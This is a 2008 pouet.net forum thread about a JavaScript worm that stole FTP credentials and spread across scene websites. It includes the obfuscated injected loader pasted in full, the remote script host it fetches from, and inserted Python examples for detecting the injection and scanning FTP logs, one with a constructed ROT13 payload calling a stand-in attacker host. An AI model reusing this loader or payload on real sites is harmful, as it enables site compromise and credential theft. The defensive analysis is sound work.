POUET.NET is hacked / infected with a javascript worm

category: general [glöplog]
Attention: Like lots of other scene websites, pouet.net has a trojan infection embedded onto its startpage. Admins, remove it from index.php, change FTP passwords.

This is done by the Russian Business Network, the most criminal spam gang in the world. Lots of other scene websites are affected, too.

The trojan sniffs all your FTP traffic, and account data from online banking and lots of other things. The sniffed FTP traffic is then used to log in to those accounts and embed the javascript into more pages.

Someone who has FTP access to pouet.net is therefore infected with this trojan, and all his account data is now in the hands of that gang. All users with pouet.net FTP access should check for this trojan now and inform all sites they are logging into by FTP. (And obviously change passwords, credit card numbers etc. after the trojan is removed)

For further details, contact me on irc.

added on the 2008-02-02 15:43:11 by scamp scamp
Yup - discovered nasty, removed from index, changed password. My AV warned me as soon as I tried to access my own page - can I then assume that I wasn't infected? That hopefully suggests that I didn't already have it...
added on the 2008-02-02 15:46:21 by syphus syphus
(er, I mean my untergrund page, obviously)
added on the 2008-02-02 15:46:59 by syphus syphus
what javascript worm / trojan ?
added on the 2008-02-02 15:51:41 by p01 p01
tell me more, please.
added on the 2008-02-02 15:57:29 by aegis aegis
is it this shit?

Code: <script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y 7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua <SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a>< ;\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>
added on the 2008-02-02 16:00:20 by El Topo El Topo
need an obscure java contest.
i commented the javascript code from index.php
hope jeffry will go through the logs and clean whatever else is infected.
i recommend people avoid using pouet for the weekend.
added on the 2008-02-02 16:04:40 by psenough psenough
I'm busy alerting lots of server admins etc, so only brief info here:

Gang behind all this:

If you are a server admin, grep your ftp logs for the following strings:

If you see successful logins from those ips/hosts, then that user is infected with the trojan, and his website probably also is.
added on the 2008-02-02 16:04:44 by scamp scamp
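The log check scamp describes, written out as an added example (not code from the thread or from pouet.net): the suspect addresses below are TEST-NET placeholders standing in for the list that was posted, and the vsftpd-style log lines are constructed for the example.

```python
import re
from collections import defaultdict

# Placeholder suspect hosts (TEST-NET ranges); the thread's real list is not
# reproduced here.
SUSPECT_HOSTS = {"203.0.113.7", "198.51.100.23"}

# Constructed vsftpd-style log lines: one account gets a successful "test"
# login in January, weeks before the website infections started.
SAMPLE_LOG = """\
Tue Jan  8 02:17:44 2008 [pid 2211] [scamp] OK LOGIN: Client "203.0.113.7"
Tue Jan  8 02:17:49 2008 [pid 2212] [syphus] FAIL LOGIN: Client "203.0.113.7"
Thu Jan 10 23:05:02 2008 [pid 2300] [syphus] OK LOGIN: Client "192.0.2.44"
Fri Feb  1 21:40:13 2008 [pid 3101] [scamp] OK LOGIN: Client "198.51.100.23"
Fri Feb  1 21:41:20 2008 [pid 3102] [psenough] OK LOGIN: Client "203.0.113.7"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)


def suspicious_logins(log_text, suspects=SUSPECT_HOSTS):
    """Map each account to its successful logins from suspect hosts, in log
    order. Any hit means that account's FTP credentials were stolen and the
    site it serves should be treated as infected until checked."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["result"] != "OK" or m["ip"] not in suspects:
            continue  # malformed line, failed attempt, or an unrelated client
        hits[m["user"]].append((m["ts"], m["ip"]))
    return dict(hits)


def first_seen(hits):
    """Earliest suspect login per account: the bots' test logins came weeks
    before the actual infections, so this dates the credential theft."""
    return {user: events[0][0] for user, events in hits.items()}


if __name__ == "__main__":
    found = suspicious_logins(SAMPLE_LOG)
    for user, ts in first_seen(found).items():
        print("%s: %d suspect logins, first on %s" % (user, len(found[user]), ts))
```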
yes, it's two pieces of code mangled twice, that inserts a script tag pointing to:

"http://www.googleanalitics.net/__utb.js"+ document.referrer
added on the 2008-02-02 16:05:36 by p01 p01
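A scanner for the injection pattern p01 describes (a self-decoding ROT13 loop handed to eval inside index.php), added here as an example; it is not code from the thread or from pouet.net. The sample page, the payload and the placeholder URL in it are constructed, and only the first of the two obfuscation layers is undone.

```python
import codecs
import re

# Markers of the injected block seen on pouet's index.php: a loop that undoes
# ROT13 with charCodeAt/String.fromCharCode and hands the result to eval().
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')      # double-quoted JS literals
MARKERS = ("eval(", "String.fromCharCode", "charCodeAt")


def decode_stage(js):
    """Undo the worm's first layer: ROT13 the longest string literal in the
    block and return it if it reads as JavaScript, else None."""
    literals = STRING_RE.findall(js)
    if not literals:
        return None
    decoded = codecs.decode(max(literals, key=len), "rot13")
    return decoded if ("function" in decoded or "document.write" in decoded) else None


def scan_page(html):
    """List every script block carrying all three markers, with the byte
    offset of the block and what its first obfuscation layer decodes to."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        compact = re.sub(r"\s+", "", body)   # the real block writes "eval( rmhc )"
        if all(marker in compact for marker in MARKERS):
            findings.append({"offset": m.start(), "decoded": decode_stage(body)})
    return findings


# Constructed sample: a clean page plus one injected block built the way the
# worm builds it (placeholder URL, not the one from the thread).
PAYLOAD = "function w(){document.write('<script src=http://attacker.invalid/__utb.js>')}"
SAMPLE_PAGE = (
    "<html><body><script>var x = 1;</script>\n"
    '<script language=JavaScript>var mf="' + codecs.encode(PAYLOAD, "rot13") + '",rmhc="";'
    "for(i=0;i<mf.length;i++){c=mf.charCodeAt(i);if((c>64&&c<78)||(c>96&&c<110))c+=13;"
    "else if((c>77&&c<91)||(c>109&&c<123))c-=13;rmhc=rmhc.concat(String.fromCharCode(c));}"
    "eval( rmhc );</script></body></html>"
)

if __name__ == "__main__":
    for hit in scan_page(SAMPLE_PAGE):
        print("injected script at offset %d decodes to: %s" % (hit["offset"], hit["decoded"]))
```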
eltopo: yep, thats the code. beer for whoever can crack what it does :D
added on the 2008-02-02 16:05:42 by psenough psenough
p01 the drunkard :D
added on the 2008-02-02 16:06:33 by psenough psenough
\:D/ people, to be on the safe side, disable JavaScript on pouet.net

a whois on www.googleanalitics.net says:

Extended Info IP Address:
IP Location: Hong Kong
Website Status: active
Server Type: Apache
Cache Date: 2008-02-02 08:05:03 MST
Compare Archived Data: 2007-10-03
added on the 2008-02-02 16:14:43 by p01 p01
and block www.googleanalitics.net using your browser's blocking mechanism or better directly in your .hosts file
added on the 2008-02-02 16:16:51 by p01 p01
presumably this only affects IE?
i must admit i'm a bit in the blue as to how a javascript file on a web page can find my stored ftp login codes.
added on the 2008-02-02 16:22:02 by skrebbel skrebbel
In case you didn't know Windows users will find theirs in C:\WINDOWS\system32\drivers\etc\
added on the 2008-02-02 16:23:57 by El Topo El Topo
the hosts file that is
added on the 2008-02-02 16:24:45 by El Topo El Topo
And OS X users in /private/etc/hosts
added on the 2008-02-02 16:28:36 by Preacher Preacher
skrebbel: it doesn't - it's a trojan downloader (not clear yet how it works, but also people not using IE at all are affected). That trojan then sniffs all your traffic locally on your PC (all your ftp sessions, ebay visits, online banking etc), and sends it to the "russian business network".

The sniffed FTP transfers are used to get username/passwords of all FTP sites you visit, the transfers and directory listings are used to find out which files to infect on that site. Later their botnet connects to those servers by FTP, infecting those websites. This is how it spreads.

Trojan infections seem to have started some weeks ago, infection of websites started yesterday evening. According to our logs their bots made test logins using stolen account data from January 8th on before they started infecting yesterday.
added on the 2008-02-02 16:39:23 by scamp scamp
Yesterday evening I had problems logging in to Pouet from my Windows box. Instead of pouet, I just got a blank page. I wonder if that's got anything to do with it..
added on the 2008-02-02 16:42:58 by Preacher Preacher
scamp: is that a windows trojan or do they infect linux machines too?
added on the 2008-02-02 16:45:07 by sparcus sparcus
Yes, probably. That should be the time they replaced the php files...

p01: that IP is from HostFresh, a cover-up fake ISP run by the RBN:

added on the 2008-02-02 16:46:06 by scamp scamp
hmm, demoparty.net seems to be infected too
added on the 2008-02-02 16:50:16 by sparcus sparcus
Ok. Some really strange things are going on here. Each time I tried to download SysProt anti-rootkit my browser said the file is corrupted. Then I downloaded it to my shell account. Unpacked it there and downloaded the exe via sftp. Then when it is saved to disk... 1 second later it disappears. Like it is deleted by some external app.
added on the 2008-02-02 16:50:20 by masterm masterm